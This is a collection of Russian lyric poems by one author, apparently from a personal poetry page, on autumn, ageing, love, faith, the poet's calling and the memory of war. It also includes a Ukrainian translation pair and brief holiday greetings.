Вряд ли сможет вдруг жизнь уподобиться сказке.


#

Самое заветное исполнится,
Надо только сильно захотеть.
Радостью и смыслом жизнь наполнится,
Можно будет многое суметь.

Повторяю это – в утешение
Тем, кого печаль взяла в тиски.
Утверждаю это, тем не менее,
Часто сам страдаю от тоски.


#

Покой…
А что это такое?
Есть жизнь – и значит, нет
Покоя.


#

Живём,
Хоть кажется,
Жить невозможно.
Поём,
Хоть, казалось бы,
Время для слёз.
И нам
Воздаётся
Милостью Божьей,
Ведь Т а м
Принимают всё это
Всерьёз.

__________________


Ворох стихов между строчек…


* * *

Пора поразительной грусти.
Низких небес немота.
Дачное захолустье.
Загородная черта.

Что ещё нужно для счастья?
Осыпанный листьями дом.
Осеннее злое ненастье
За запотевшим окном.

Долгая пауза ночи
В короткой, как жизнь, судьбе.
И ворох стихов – между строчек,
В которых любовь к тебе.


* * *

Листопад на земле, листопад.
Словно лето, жизнь канула в Лету.
Стаей воронов мысли кружат –
Панацеи от памяти нету.

Листопад на земле, листопад.
Время замки воздушные рушит.
К светлой цели бреду наугад,
Обдирая о тернии душу.

Листопад на земле, листопад.
Всё разорвано, скомкано, стёрто.
Разъясните мне, кто виноват,
Что не верю ни в Бога, ни в чёрта.

Листопад на земле, листопад.
Неуютно и холодно в мире.
От бессилия губы дрожат
И рвут руки – струны на лире.


* * *


Пусть уйду, когда в щедрой природе
Гибель выглядит как торжество…

.............................Татьяна Галушко


А я хотел бы умереть, как лес…
Не становясь болезненным и старым,
Лес озаряет синеву небес
Янтарным, ослепительным пожаром.

Лес принимает, словно праздник, смерть,
В своём конце он краше, чем в начале, –
Чтоб никому не вздумалось посметь
Подумать об утрате и печали.


Пора листопада


* * *

Пора листопада,
…………….пора листопада.
Рушится крон
…………….золотая громада.

Шуман и шелест,
…………….шорох и Лист –
Перемешались,
…………….пересеклись.

Отрада душе,
…………….для сердца – услада.
Пора листопада,
…………….пора листопада.


* * *

Шорох и шелест. Неспешные мысли
Искрами тают в октябрьской прохладе.
Под ноги стелются мокрые листья –
Угли остывшие старого сада.

Серо и стыло. Стремленье к покою.
Еле заметная нить паутинки
Режет, как масло режут струною,
Глыбу эфира на тонкие льдинки.
Елко и волгло. В костре краснотала
Юркою ящеркой лето пропало.


* * *

Сквозные шорохи осенние.
Дымов отвесное стояние.
Всё ближе с каждым днём забвение,
Короче и бледней сияние.
И, словно прервано дыхание
В момент свободного падения,
Объемлет душу замирание –
От листьев смертного парения.


Не можешь этого не знать…


* * *

….….Надежды нету в утешенье…
………………….М. Ю. Лермонтов

Не можешь этого не знать:
Надежда – тоже благодать.
Так не лишай меня надежды,
Чтоб было радостно, как прежде.
Чтоб не казалась жизнь напрасной
И в самый горький и ненастный
День не хотелось умирать.
Даруй надежды благодать.




Сумерки неслышно вырастают…

(из давнего)

* * *

Сумерки неслышно вырастают.
Клонят росы травы до земли.
Выйди, ты услышишь, как вздыхают
На ветру седые ковыли.

Выйди, ты увидишь – по равнине
Стелется позёмкою туман.
Осень, опустившись у полыни,
Пьёт с колен остуженный дурман.

Вызревает где-то в поднебесье
Самая высокая звезда...
Выйди, погрустим с тобою вместе –
Не было так грустно никогда!

Выйди, не по этой ли тропинке,
Выцветшей за лето добела,
Наша юность в розовой косынке
Незаметно в прошлое ушла?

Новосибирск
1983


Зелёный домик в глубине двора...

Зелёный домик в глубине двора.
Под окнами – увядшие сирени.
Растёт дымок печального костра,
Разложенного из листвы осенней.

Скупое солнце, паутины блеск,
Последних астр прощальный яркий всполох.
За речкой – осыпающийся лес,
Держащий птичий гам на ветках голых.

От синевы кружится голова,
От едкого – глаза слезятся – дыма…
Всё подтверждает мудрые слова:
Ничто не вечно. Всё неповторимо.


Листопад

* * *

Не хочу, не желаю, не буду…
Враки! Буду, желаю, хочу!
Навзничь падаю и хохочу,
Мну спиной разноцветную груду.

Ворох шороха вихрем вздымаю –
«Листопад, господа, листопад!»
«Господа» только шаг ускоряют
И с опаской на это глядят.



Не пишу стихов – нет времени…



* * *

Не пишу стихов – нет времени.
Есть дела и поважней.
Из пегасового стремени
Выбит суматохой дней.

Словно витязь на распутье,
Дёрнув не за ту вожжу,
Не на тот направил путь я
Свои стопы. И живу

Не по тем теперь законам,
По которым надо бы…
Заросли души газоны
Ядовитой ягодой.



Стихи из стола



* * *

Печальных много строк,
Признаться честно, вывел.
Но мера, видит Бог,
Есть грусти и унынью.

Приходит час, когда
Ты ясно понимаешь,
Что лишь любовь всегда
С души снимает камень.


* * *

Не найти ответа,
А вопросов – тьма.
Для чего вся эта
Жизни кутерьма?
Для чего томленья
Непосильный груз?
Горьких слёз лиенье
И сквозная грусть?
Отчего невзгоды
Преграждают путь?
В чём, какого рода
Бренной жизни суть?..
В поисках ответа,
Тычась в стены лбом,
В лабиринте этом
Наугад бредём.


* * *

Жизнь – сплошные крайности.
Трудно это вынести.
Нет бы что-то среднее
Нам преподнести.

Рай – когда мы в радости,
Ад – когда мы в горести.
Проявленья вредные,
Господи прости…


* * *

Хотите радости?
А где
Я вам её возьму,
Когда весь мир
Сейчас в беде
И стон стоит
От мук…


* * *

Жизнь – тайга, и нрав её не ласков.
Продираюсь. Буреломы, мхи…
Отмечают след, как в страшной сказке,
Чтобы возвратиться мог, стихи.


____________________


Жизнь – суета…

* * *

Жизнь – суета.
Суматоха, содом,
Будто играешь в пятнашки.
Мячик бросаешь – и – поделом! –
Что ни попытка – промашка.

Счастье опять увернулось –
Гляди –
Пятки сверкают.

Слёз не сдержать.
Прижимаю к груди
Мяч,
Словно камень…



Грусти коварная трещина

* * *

Мало что из того, что обещано
Было нам, к сожаленью, сбылось…
Осень.
............Грусти коварная трещина
Пролегла через душу насквозь.

Сквозняком продувает родимую,
В дрожь бросает от брызг ледяных…
Ощущаешь беднягу незримую
Очень явственно в горестный миг.


Час сомнений наступает

Снова осень осыпает
Листья в мокрую траву.
Час сомнений наступает:
Так ли, тем ли я живу?

Ту ли я дорогу выбрал,
Дело ль то, что по плечу?
Не искал ли в жизни выгод?
Коль искал, то почему?

Кто я, что я, и зачем я?..
На осеннем на ветру
Снова сыплются с деревьев
Листья в мокрую траву.


В душе, теснимой пустотой…

* * *

(триолет)

             Алексею Борычёву


В душе, теснимой пустотой,
Нет места для любви и веры.
Защитной нету атмосферы –
В душе, теснимой пустотой,
Химеры станут на постой
И будет бед тогда без меры.
В душе, теснимой пустотой,
Нет места для любви и веры.


Чтоб мир покинуть не могли

* * *

Какой лазурный небосвод!
А сердце – залито слезами.
Неужто жизненный исход
Не за горами?

Природа к нам благоволит
И дарит чудные мгновенья,
Чтоб мир покинуть не могли
Без сожаленья.


Крайности

* * *

И я скулю, когда прижмёт,
И утверждаю: жизнь – не мёд.
И я виновного ищу
И на судьбу свою ропщу.
Жизнь ничему, бурчу, не учит,
А только мучит, мучит, мучит…
Но стоит попустить вожжу, –
О счастье уши прожужжу.


Я на тот свет не унесу…


* * *

Я на тот свет не унесу
В последний миг с собой
Ни мира светлого красу,
Ни светлый облик твой.

Блуждая там, где света нет,
Во тьме небытия, –
Тебя, любовь моя, мой свет,
С собой не взял бы я.

И если б ты рванулась вслед,
Свой торопя черёд, –
Туда, на тот постылый свет,
Я заградил бы вход.

О как на вечный мрак обречь
Огонь любимых глаз!
Давай же, милая, беречь,
Что светит нам сейчас.





В пору грибного сезона

* * *

С трудом
Из лесу выбрался.
В пору
Грибного сезона
Столько в лесу озона,
В загородной
Зелёной зоне,
Что уходить
Не резонно.
Да и денёк
Чудный выдался…

С трудом из лесу
Выбрался.


Сентябрьский этюд



* * *

Косы ивы
ветра порывы
треплют.
Сорванный с веток,
каждый листок
перечёркивает наискосок
лето.



Соблазнитель


* * *

Я напишу тебя в лесу,
Среди пожара красных клёнов,
Чьи ветви зябкие влюблёно
И чуть, быть может, удивлённо
Листочки держат на весу.

Я напишу тебя в лесу,
Пропахшем прелью и грибами,
Где лоси жаркими губами
Пьют, наклонившись над ручьями,
Небес остывшую красу.

Я напишу тебя в лесу,
Распахнутом ветрам навстречу,
В косынке, сброшенной на плечи.

С корзинкой крохотной в ручонке
Красивой рыжею девчонкой
Я напишу тебя в лесу.


Автопародия:


СОБЛАЗНИТЕЛЬ

Я соблазню тебя в лесу.
Я соблазню тебя под клёном
(Берёзой, ёлкою зелёной) –
Под песнь картавую вороны
И дятла монотонный стук.

Я соблазню тебя в лесу.
Сманю как будто за грибами,
А лучше – собирать гербарий
На солнцем залитой поляне,
Ещё не сбросившей росу.

Я соблазню тебя в лесу.
Ты только не забудь про встречу.
Косынку повяжи на плечи,
А то постлать нам будет нечем…
К тому же холодно под вечер
В осеннем, знаешь ли, лесу.


Кукушка


Может, считает дни до отлёта.
Может быть, листья,
…………….что ветер срывает.
Глупо ведь думать,
……………...что годы считает.
Тогда отчего душа замирает,
Когда так внезапно –
…………….сбившись со счёта
Иль спугнута кем-то –
..........................она замолкает?


Жизнь – это скорый…


* * *

Жизнь…
Жизнь – это скорый.
Я в нём лечу,
                    лечу,
                           лечу
До остановки,
                     на которой
Тихонько хлопнут по плечу.
И скажут так:
                     – Прощай, дружище.
Пора,
        пора тебе сойти.
Уж осень.
               Слышишь: ветер свищет?..
А я в ответ:
                 – На полпути?
Неужто всё?
                   Неужто точка?
И вырвется из горла крик:
– Постой, браток!
                           Ещё немножко!
Ещё пыхтит мой паровик!
Ну как же так?
                      Ну как же можно?!
Ей-ей, колёса покручу!
Давай зелёный!
                       Осторожно!
В последнюю
                     весну
                               лечу!


На закате



* * *

Вечер.
……...Ветер.
…………….Дрожь
Пробирает тишь.
Речки острый нож
Врезался в камыш.
Стебли обагрив,
С лезвия – в залив
Кровь течёт зари…


Хандра

Ну, что ты, право,
не хандри!
Мир дарит радость.
Посмотри,
какие краски –
красота!
Небес лазурна
высота.
День лучезарен,
ни одной
нет в небе тучки
над тобой.
Воспрянь,
душою воспари! –
твержу,
пуская пузыри.




Всё реже нас прошедшее тревожит...

* * *

Всё реже нас прошедшее тревожит,
Сегодняшний всё тяжелее гнёт:
Неумолимо мучает и гнёт
И злое в душах озлоблённых множит.

Всё реже нас прошедшее тревожит,
И радость прошлая не в сладость нам.
Сегодняшнее болью свежих ран
Сердца измученные гложет…


К жизни



Называют тебя непомерно тяжёлой?
Ну а ты оправдайся, мотивчик весёлый
Насвисти, вторя певчей пичуге лесной, –
Нам тогда будет легче поладить с тобой.



Августовские этюды



* * *

Август.
Полдень.
Покой.
Над рекой
Мотылёк порхает.
Отраженье
Голавль хватает –
Глупый какой!


* * *

Медью горя на солнце,
Граммофонные трубы настурций
Медленно выдыхают в август
Шмелей мохнатые ноты.


* * *

Так много падает звёзд,
что не хватает на все
желаний.


* * *

Целуемся на сеновале.
Через дырявую крышу
подглядывают звёзды.


* * *

Сухой листок
в капюшоне дождевика.
Не отыскав карман,
опустила в него
визитную карточку
осень.


Сейчас уже в это с трудом верится…


(юношеские стихи)


ХАТА

Поры шевченковской ровесница,
Взметнув высоко тополь вверх,
Устало опершись на лестницу,
Как на клюку,
………………который век
Стоишь вот так
………………..ты у калиточки,
Тревожно вглядываясь в даль, –
Как с репродукции открыточной
Иль фото,
…………сделанного встарь…


* * *

Здесь небо такое низкое,
Потянись –
…………....и достанешь рукой,
Как яблоко с ветки,
…………………….лучистую
Звезду, что взошла над тобой.


* * *

Сейчас уже в это с трудом верится,
А в детстве, поднеся к губам палец,
Я шептал, что видел – две медведицы
Ночью в Млечной реке купались.

_______
1982


Без тебя

БЕЗ ТЕБЯ

................ Л. С.

1.

Теперь я понял,
Кем с тобою были мы –
Две птицы
Из одной огромной стаи.
Мы лишь коснулись
Трепетными крыльями
Друг друга –
И навек расстались.

2.

Как живу я без тебя –
Даже сам не знаю.
Жизнь – не жизнь, а полынья,
Бездна ледяная.

Глянешь – страшно до того,
Что мороз по коже...
Очень трудно без того,
Кто всего дороже.

3.

Сбрею бороду, – без бороды
Я, конечно же, стану моложе.
Как мне хочется, что бы ты,
Так как прежде, сказала: Серёжа.

Чтоб ладонью коснулась щеки,
Омоложенной острою бритвой…
Только мы теперь так далеки, –
Не дотянешься даже молитвой.


Утро вечера мудреней

* * *

Утро вечера мудреней.
И я верю, что завтра утром
Просветлённым стану и мудрым –
В непутёвой жизни своей
Разберусь без затей.

Утро вечера мудреней.
Утром мудрость моя утроится.
Всё уладится, всё устроится,
И не хуже, чем у людей.

Утро вечера мудреней.
Утро смехом любимой наполнится,
Одинокой души моей горница
Станет радостней и светлей.

Утро вечера мудреней.
Только вот – с течением дней
Мои ночи длинней и длинней…


Так и живу

* * *

Не хлебом единым…
Так и живу.
Покрыли седины
Густо главу,
А скарба не нажил.
Больше того –
И быт не налажен.
Нет своего
Угла, чтобы можно
Было всегда
Укрыться надёжно,
Если беда…
Навеса б хватило
Мне – от дождя,
Но даже для лиры
Нету гвоздя.



В три строки

*

Течёт река времени.
Вращает колесо жизни.
Мелет людские судьбы…

*

Три сосны посадил –
чтоб было где
потом заблудиться.

*

Ружья и стаканы
разбивают о камни.
Те и другие – на счастье.

*

Между прошлым 
и будущим барахтаюсь,
пловец неумелый.

*

В чём смысл жизни? -
загоняю Google в угол
этим вопросом.


Рассказ отца

Мать холсты ткала.
Мальчишкой
Я носил их поутру
К речке клюкинской*
Под мышкой,
Чтоб просохли на ветру.
Чтоб на солнце побелели, –
По-над самою водой
Расстилал их…
Ой, как пели
Жаворонки надо мной!
Целый день – сиди и слушай –
Льётся песня с вышины.
Каждый звук – ну прямо в душу,
Каждый звук – до глубины!

__________________
* Безымянная речушка возле д.Клюкино на Смоленщине, родине отца.


Тишина – это звук


* * *

Тишина – это звук,
Ведь кромешной она не бывает.
Просто нам недосуг,
Всё никак мы не успеваем
Среди суетных дел
Остановиться, послушать.
Быт нас заел.
Заложил ватой души.



Нами измеряется время

*

Мы – песчинки
в огромных
песочных часах.
Нами измеряется
время
земной
жизни.

* *

Человек – сосуд,
через который
перетекает
будущее в прошлое,
оставляя в сите памяти
наиболее значимые
мгновенья.

* * *

Чертовски не хочется, чтобы
только пара старых штиблет,
оставленная на сыром берегу Стикса,
свидетельствовала
о моём пребывании на Земле.


Это вечностью стало

ЭТО ВЕЧНОСТЬЮ СТАЛО
(перевод с украинского)


Валентин Грабовский
(1937 – 2004)


* * *

Это вечностью стало, вечностью стало,
Как ты в юности нежно меня целовала,
Как рассыпала косы, и они разлетелись
По плечам… Ты смеялась, а косы звенели…
А любила, иль нет?.. Ну, какое вам дело,
Чьё там сердце болело, а чьё – не болело?..
Помню только одно: как счастливо смеялась.
Это осталось,
Это вечностью, вечностью стало.


Оригинал:


* * *

Це вже вічністю стало, вічністю стало,
Як ти віддано й ніжно мене цілувала,
Як розсипала коси, а вони зазміїлись
По плечах… Як сміялась, а коси дзвеніли…
А любила, чи ні?.. Ну, яке кому діло,
Чиє серце боліло, а чиє – не боліло?..
Пам’ятаю одне: як щасливо сміялась.
Це й зосталось,
Це вічністю, вічністю стало.



Когда-то здесь было море

Колись тут було море


Судячи
з хрускоту під ногами
черепашок,
колись тут було море.
Тепер – степ.
А я уявив, що море.
Кинув плоский камінець – скаче!


Авторский перевод:


Судя
по хрустящим под ногой
ракушкам,
когда-то здесь было море.
Теперь – степь.
А я представил, что море.
Бросил плоский голыш – скачет!


Возможно ль – с чистого листа...

* * *

Возможно ль – с чистого листа,
Когда, как губка, выжат жизнью.
Душевных ран не залатать,
И разум – против героизма.

Познал достаточно. Увы,
Познанья смысл не прояснили.
Бежал тюрьмы, сумы, молвы,
Но сломаны паденьем крылья.

Раздавлен тяжестью креста,
Куда там – с чистого листа…



Каждым мигом дорожу


* * *

Каждым мигом дорожу.
Жду лишь доброй вести.
Слова грусти не скажу, –
Умоляй, хоть тресни!

Прошлого не ворошу.
Жизнь промчалась – пёс с ней!
Дней остаток завершу
Радостною песней.



Позиция

                  Ю. А-ву

Сказали мне:
– Вот этот вот,
с которым ты на этом фото,
не фото-
...............геничен что-то.
Не стоит вклеивать в альбом.

А я – в ответ – на снимке том,
вернее, на его подложке,
напомнив что-то об одёжке
и об уме,
...............наискосок
черкнул размашисто:

...............Дружок!
Не всяк, кто фотогеничен,
бывает дорог и приличен.


Хочется времени крикнуть: «Постой!»

* * *

Хочется времени крикнуть: – Постой!
Что ты несёшься, летишь оголтело?
Разве не видишь, что мы за тобой
Не поспеваем? На шаг то и дело
Мы переходим, а то и совсем
Валимся с ног – нам с тобой не тягаться.
Да и, признаться, охота не всем
Вслед за тобою куда-то срываться.

З а в т р а пугает, с е г о д н я – ясней,
Тем, что оно как-никак наступило.
Лучше не стало – и стало грустней,
Чем в злополучном в ч е р а ещё было.
«Время, постой!» – а не «Время – вперёд!» –
Хочется крикнуть отчаянно, братцы.
З а в т р а – оно, безусловно, придёт,
Только не все его смогут дождаться.



Происшествие

ПРОИСШЕСТВИЕ
(сон)

          Памяти Юрия Анисимова

Мне друг позвонил:
– Посоветуй, что делать?
Вчера написал неплохие стихи,
А – шельма! – душа совсем ошалела:
Украдкой украла две лучших строки.
Крылья одела – и улетела –
Замаливать тела
Земные грехи...

Молчанье.
Гудки.


Стихи из дневника


* * *

С каждым днём отстаю
От поэтовой стаи.
Отговорку мою,
Дескать, всё наверстаю,
Уж не слышит никто,
Если слышат, – не верят.
Видно, строк шепоток
Не внушает доверья.


* * *

Всё реже озарения, всё реже.
Всё больше – помрачение ума.
Бессонница. Хандра.
Зубовный скрежет.
Проклятья. Чертыханья.
Даже – мат…


* * *

Чем дальше, тем трудней,
Хоть окружён заботой,
Хоть круг широк друзей
И редок ряд врагов.
Чем дальше, тем трудней
Унять печаль работой,
Которой без затей
Отдаться весь готов…


* * *

Из строк сооружаю хлипкий плот –
Чтоб удержаться на плаву средь ночи.
А там – рассвет, там солнышко взойдёт –
Туман сомнений разлетится в клочья.


* * *

Ничего не изменить, я знаю.
Жизни круг по новой не пройти.
Как свечной огарок, догораю,
И хотя почти не освещаю,
Продолжаю всё-таки светить.


Не люблю цветы в хрустальных вазах…



* * *

…он не любил цветов садовых,
а полевые обожал…

…………………..Я. Смеляков


Не люблю цветы в хрустальных вазах.
Мне, признаться, больше по нутру
Те, чей запах нежен и не вязок,
Те, что стынут в росах поутру.

Васильки во ржи, ромашки в поле,
Колокольчики на пустыре –
Любы сердцу и дороже боле
Роз капризных в звонком хрустале.


Июньское


* * *

Я на ладонь стряхну с травы росу,
Охваченную заревом рассветным,
К лицу несмело руку поднесу
И прикоснусь губами незаметно
К прохладе каждой капельки живой,
Как будто к самому рассвету, –
И захлебнусь нечаянной слезой,
Почувствовав прохладу эту…

______________________________




С наступлением ЛЕТА, друзья!
Тепла, солнца, радости!
Вдохновения и светлых пронзительных строк!




Моё второе «я»


* * *


То, что я пишу, – это я и есть.
............................. Лев Озеров


Лирический герой – не выдумка, друзья.
Лирический герой – моё второе «я».

Раздвоенность моя не родственна болезни, –
Лирический герой и нужен, и полезен.

За всё, что я вложил в его уста, поверьте,
В день Страшного Суда придётся мне ответить.


Не претендую

* * *

Видит Бог, не претендую
На признанье и почёт.
Для души, скорей, рифмую,
Отражаю, что влечёт,
Что волнует и покоя
Не даёт, пока на лист
Не уляжется строкою,
В коей ты предельно чист.


Злосчастный марафон

* * *

Вопрошанье вечное, отвечанье
И Того, кто выдумал всё, молчанье.

..................................Лариса Миллер


Хотелось, полегче чтоб было, да только,
Как видно, такому вовек не бывать,
Ведь даже на Бога нельзя уповать, –
Молчит, нашей долей не тронут нисколько.
Молчит безучастно, как будто не он
Затеял злосчастный такой марафон.


Строфы XII


* * *

А вначале, как водится, Слово.
Изначально оно было – Бог.
Кто хоть раз прикоснулся к основам,
Тот, в итоге, познает итог.


* * *

Воображения вольная птица,
В клетке тебе не пристало ютиться.
В клетке уютно, тепло и не дует,
Но рай за решёткой не существует.


* * *

Ничего не изменить, я знаю.
Жизни круг по новой не пройти.
Как свечной огарок, догораю,
И хотя почти не освещаю,
Продолжаю всё-таки светить.


* * *

Свои имена без истерики
Вносим в историю мы,
Малой за то похвалы
Не требуя даже толики.
Дознаются только историки,
Как были мы в жизнь влюблены.


* * *

От смерти на волосок,
Жизнью выжатый, как лимон,
Верю: живителен он –
Стихов моих горький сок.


Не списался...

Не списался. Кто сказал?
Порох есть и есть запал.
Ко всему, на зависть всем,
Есть в запасе уйма тем.
Планами богат, как Крез,
Только времени в обрез.


Можно, конечно, спрятаться...

* * *

Можно, конечно, спрятаться в норку,
Жить-поживать себе втихомолку.
Можно, конечно, забраться поглубже,
Забаррикадировать двери к тому же,
Окна зашторить и ставни закрыть.
Можно от мира себя оградить.
В тёплом укромном своём закутке
Зыбкое счастье держать в кулаке.
Можно, конечно, да только, скажи,
Будет ли это достойная жизнь?


Прошлое – мираж, фантом…

* * *

Прошлое – мираж, фантом.
Но сжигать мосты не стоит.
Можно не грустить о том –
О прошедшем, о былом,
Но нельзя ломать устои.
Словно сваи, прожитое
Держит нас сейчас с тобою.


Катрены


* * *

Первородна суть вещей,
Сами вещи – инородны.
Суть души – парить свободно,
Тело лишь мешает ей.


* * *

Стучусь к тебе, а достучусь ли,
Иного времени посланник.
Века пролягут между нами,
И оттого несносно грустно.


* * *

На свете, к сожаленью, счастье мнимо.
Печаль и радость в жизни заодно,
Как горькое и сладкое вино,
Что на поминках, что на именинах.


По мнимому кругу


* * *

По сути, вся жизнь – суета,
Движенье по мнимому кругу.
В конце – роковая черта
Петлёю затянется туго.

И всё: ни кола, ни двора
Не надо душе отлетевшей.
Наступит сплошное вчера
Суетной жизни прошедшей.


Безымянные могилы


Сколько их по просторам российским!
Просто так – без крестов и без звёзд,
Без взметнувшихся ввысь обелисков –
Скромным холмиком возле берёз.

Безымянных. Поросших травою
И омытых водой дождевой,
Что хранят неизвестных героев,
Принакрыв их землёю родной.

Сколько их, что, как старые раны,
До сих пор носит наша земля...
Слишком многих война избирала
И не многих щадила война.

Слишком много поставила точек
В биографиях славных сынов.
Всюду этот разборчивый почерк
В виде старых могильных холмов.

1981





_________________________

С Днём памяти и наступающим Днём Победы.
Никто не забыт, ничто не забыто.
Мы помним и гордимся вами, защитники и освободители.


Над Тетеревом нет тетеревов…

* * *

Над Тетеревом нет тетеревов.
И воды мрачные река несёт, тоскуя:
Не в силах позабыть ни их любовь,
Ни то, как по весне они токуют.

Над Тетеревом нет тетеревов…



___________________________________

Тетерев-самый крупный правый приток Днепра, полностью расположенный на территории Украины. Берет начало на Приднепровской возвышенности, недалеко от границы Житомирской и Винницкой областей. Протекает по территории Чудновского, Романовского, Житомирского, Коростышевского и Радомышльского районов Житомирской области и Иванковского района Киевской области.
Происхождение названия реки Тетерев точно не установлено. По одной из версий, название происходит от названия птицы тетерев, распространенной в прибрежных лесах. По другой версии, Тетерев может быть переосмыслением какого-то древнего названия.


Замирания сердца на грани


* * *

Словно гряды дремучим пыреем,
Зарастаю стихотворением.

И запутано, и непролазно –
Весь в репьях речевого соблазна.

В зыбких звуках, страдая от зуда
Немоту надломившего гуда.

Замирания сердца на грани
Выдыхаю слова из гортани.

И, как роща рассветная пеньем,
Разрешаюсь стихотворением.


Звёзд с небес я не хватал



* * *

Звёзд с небес я, право, не хватал,
Чаще – балансировал над бездной.
Лености себе не позволял,
Божий дар оплачивая честно.

Так, презрев хвалу и славы медь,
Выход до сих пор ищу в работе.
И когда придёт срок умереть,
То умру за строками в блокноте.



По следу классиков


* * *

Идём
По следу классиков,
И всё же
Свою дорогу
Проторяем тоже.
Негоже,
Друг мой,
На судьбу пенять.
Коль призван ты творить, –
Изволь писать.


Молитва



Врачуй меня болью, сыпь в раны соль,
Чёрствым душою стать не позволь.

Избавь от того, чтоб гремучей змеёй
Зло заползло в сердце моё.

Не допусти, чтобы совесть во мне
Почила навек в летаргическом сне.

До судного часа, томя и казня,
Не дай мне напрасно растратить и дня.


NB

Жизнь прожита, и даром, нелепо,
пошло прожита – вот что горько!
Вот это бы стряхнуть как сон,
вот от этого бы очнуться…

      И. С. Тургенев, «Затишье»



Ах, чёрт…
Жизнь прожита, и даром,
Нелепо, пошло прожита.

Теперь мне кажутся кошмаром
Давно минувшие лета.

Всё словно сон, и сон печальный.
Очнуться б от него, забыть…

«Затишье».
Повесть чрезвычайно
Сумела всё разбередить.

_____________________________________
NB – лат. nota bene – пометка в каком-л. тексте около места, на которое требуется обратить особое внимание.


Мир меня настиг…


* * *

Уединился,
душу чтоб спасти.
Отгородился
четырьмя стенами
от мира.
Только мир меня настиг –
нахлынул страшным
новостным
цунами.


Гашу огонь души



* * *

Ой, что-то, милые, со мною деется:
Устал я верить, перестал надеяться.

Покрыла душеньку мою окалина,
Стал неприкаянней бедняги Каина.

Нет мне прибежища, нет мне пристанища,
Судьба куражится – злодейка та ещё!

Покоя нет в ночи – всё совесть мучает.
Гашу огонь души слезой горючею.


Апрельские штучки

Пасхальное


На Пасху,
красный от винца,
…………………...скатился
……………………………..крашенкой
………………………………………….с крыльца.



* * *

Страсти прокисли, протухли желания,
Тяги к застольям, к сборищам нет.
Днями – за книжкой – лежу на диване я.
Анахронизм и анахорет!


* * *

             Олегу Озарянину

По-собачьи гребём, не брассом.
Что поделаешь, брат, стареем.
Но, как говорил Некрасов,
Сеем разумное, сеем!


Жизнь меня всё-таки любит...

* * *

А знаете, жизнь меня всё-таки любит,
Хоть часто терзает и редко голубит.
Порою настолько несносна, что с ней
Готов рассчитаться как можно скорей.
За то, что подводные камни таит,
Клянёшь, материшься на чём свет стоит...
А только утихнет в груди колотьё –
Опять обожаешь и ценишь её.


Это будет


* * *

Я уверен,
что строк не остудит
ветер времени.
В 22-ом
веке
снова потянутся люди
к чтенью книг,
как то было в былом.

Нас прочтут.
Нас поймут.
Это будет!
Ты твори
и не думай о том.


Сентиментальное



* * *

Не пла'чу – это я плачу'
Таким макаром за удачу,
За то, что уяснил задачу
И ношу выбрал по плечу.

За то, что жизнь не волочу,
А полноценно проживаю.
Плачу' – и слёзы не скрываю,
Не сдерживаю лаву чувств.


Шуточное

Что можно воздухом питаться –
Вам подтвердит любой пиит.
Коль в гости Муза прилетит,
Не до борщей, ей-богу, братцы!



Как на улице, так и в душе…

* * *

И на душе не рассветает,
В ней тот же холод, что кругом…

                   А. А. Фет 

Как на улице, так и в душе –
Неуютно, сумрачно, голо.
Зябнет в мартовском неглиже
На рассвете пустынный город.

Нудно сеется что-то с небес,
Что-то хлюпает под ногами.
Потеряв ко всему интерес,
Я по жизни брожу кругами.

Ничего уже больше не жду,
Ничего давно не желаю.
Там, глядишь, по ледку скольжу,
Там, глядишь, по грязи шагаю…


Божья милость коротка...

* * *

Божья милость коротка.
Ничего нельзя поделать:
Тяжела ли жизнь, легка, –
Ограничена пределом.

Той чертой, порогом тем,
За которым – мрак кромешный.
Потому и горьких тем
Избежать нельзя, конечно.

Тем не менее, живём,
Напрягаясь до предела.
Крепче духом с каждым днём,
Но – увы – дряхлее телом.


Чтобы грусть прогнать скорей

         (улыбка)


Что грустишь с утра, пиит?
Солнышко в окно глядит.
Солнца свет налит в окно,
Словно в рюмочку вино.
Чтобы грусть прогнать скорей,
Из оконца солнце пей!


Одной мы, братцы, нации


* * *

Неспешно цедим горькую
Под горький смак стихов.
Бычки и пепел – горкою –
Взамен самих бычков –
В жестянке, искорёженной
Охотничьим ножом.
Огурчик – как положено,
Лимончик и боржом…
Пускай, слегка лишь выбриты,
Кому-то лишек – сто,
Но шпарим неизбитыми
Мы рифмами зато!
И «шо» звучит здесь гордое,
И простенькое «чё»,
И всё – путём, по-доброму,
Хоть спорим горячо.
Во всей цивилизации,
Свидетель Бог, не вру:
Одной мы, братцы, нации –
СОБРАТЬЯ ПО ПЕРУ.




Айда в рай!

* * *

Не нужны ключи от рая,
По весне – повсюду рай.
Радует трезвон трамвая,
Радует вороний грай.

Солнце – радостно, что блещет.
Дождь – отрадно, что идёт.
Кажется, простые вещи,
А как за' душу берёт!

В воскресенье, вероятно,
В лес отправлюсь как всегда.
Там уж точно рай, ребята.
Кто со мною в рай – айда!


Строфы XI


*

Моя родня не обращалась к музам,
И сам не знал я, взявшись за стило,
Каким стихосложенье будет грузом,
Лишь позже понял – вправду тяжело!


* *

Есть срок для слова, срок для тишины.
И мы их различать приглашены.
За невпопад промолвленное слово
Карают небеса вдвойне сурово.


* * *

День ото дня перо
…………………..в руке всё тяжелее, –
Не капелька чернил –
……………………….вся жизнь висит на нём.
Ни в малом, ни в большом
………………………..кривить душой не смею,
Коль говорю, – о том,
……………………….что сердце жжёт огнём.


Никак весна в права не вступит...

* * *

Никак весна в права не вступит.
Не отступает холодок.
На днях станица диких уток
Спустилась на речной ледок.

На быстрине лишь, там, где русло,
Для птиц доступная вода, –
И утки по полоске узкой
Весь день снуют – туда, сюда.

Прилёт их ранний – подтвержденье:
Зиме обратно ходу нет.
Апрель готовит наступленье,
Мир ждёт стремительных побед.


Поэтовой братии

Бросьте споры – пустые забавы:
Меж собой несравнимы поэты…

............................Яков Белинский


Кто талантлив, кто просто случаен, –
Спорим всё,
......................а, скажите, что толку? –
В склоках зря лишь себя расточаем.

Час придёт –
.......................беспристрастно потомки
Нас рассудят – на пыльные полки
В алфавитном порядке поставят.


Начало марта



* * *

Ну вот и кончилась зима.
Начало марта. Синь и свежесть.
В душе такая плещет нежность,
Что можно сдвинуться с ума.

Да, от переизбытка чувств
Вполне реально – чувств лишиться.
Ещё реальнее – влюбиться.
Мне б стать моложе, хоть на чуть!..


Бренной жизни тащу бревно…


* * *

Бренной жизни тащу бревно.
Капли пота и слёзы роняю.
Ляжет в сруб ли избы оно
Или шпалой под рельсы – не знаю.

Напрягаю плечи и пресс.
Обминаю старательно камни.
Понимаю: важен процесс,
А не сам результат, как ни странно.

Не споткнуться бы, донести.
Там найдутся, кто будет строить.
Там, в конце твоего пути,
Разберутся, чем удостоить.


Стихи на запотелом окне



* * *

